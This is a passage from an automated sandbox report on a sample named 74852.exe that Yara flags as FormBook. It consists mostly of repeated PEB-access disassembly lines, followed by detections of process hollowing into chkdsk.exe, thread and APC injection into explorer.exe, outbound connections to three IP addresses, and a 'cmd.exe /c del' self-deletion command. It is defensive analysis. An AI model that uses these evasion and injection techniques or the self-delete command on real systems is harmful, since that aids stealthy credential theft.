          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014A41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014C8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01442581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01442581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01442581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01442581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01412D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01412D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01412D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01412D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01412D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01442990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01441DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01441DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01441DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01430050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01430050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01497016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01497016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01497016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014AB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01496CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01419080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01493884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01493884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01443B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01443B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01414F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01414F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014CD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01421B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01421B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01442397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01428794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01497794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01497794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01497794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01444BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01444BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01444BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01419240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01419240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01419240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01419240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014DAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014DAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014DEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014A4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0145927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01448E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01428A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01415210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01415210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01415210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01415210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01433A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01454A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01454A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014CFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01458EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014CFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01442ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01442AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014AFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 0_2_00237910 GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapAlloc,
          Source: C:\Users\user\Desktop\74852.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 185.78.22.74 80
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.242.153 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\74852.exeSection loaded: unknown target: C:\Users\user\Desktop\74852.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\74852.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\74852.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\74852.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\74852.exeThread register set: target process: 3292
          Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 3292
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\74852.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\74852.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 1250000
          Source: C:\Users\user\Desktop\74852.exeProcess created: C:\Users\user\Desktop\74852.exe 'C:\Users\user\Desktop\74852.exe'
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\74852.exe'
          Source: explorer.exe, 00000002.00000000.247067838.0000000001400000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
          Source: explorer.exe, 00000002.00000000.247067838.0000000001400000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.247067838.0000000001400000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.246830298.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: ProgmanX
          Source: explorer.exe, 00000002.00000000.247067838.0000000001400000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000002.00000000.268504207.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndAj

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.74852.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.74852.exe.2fa0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.74852.exe.2fa0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.74852.exe.400000.1.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.74852.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.74852.exe.2fa0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.74852.exe.2fa0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.74852.exe.400000.1.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

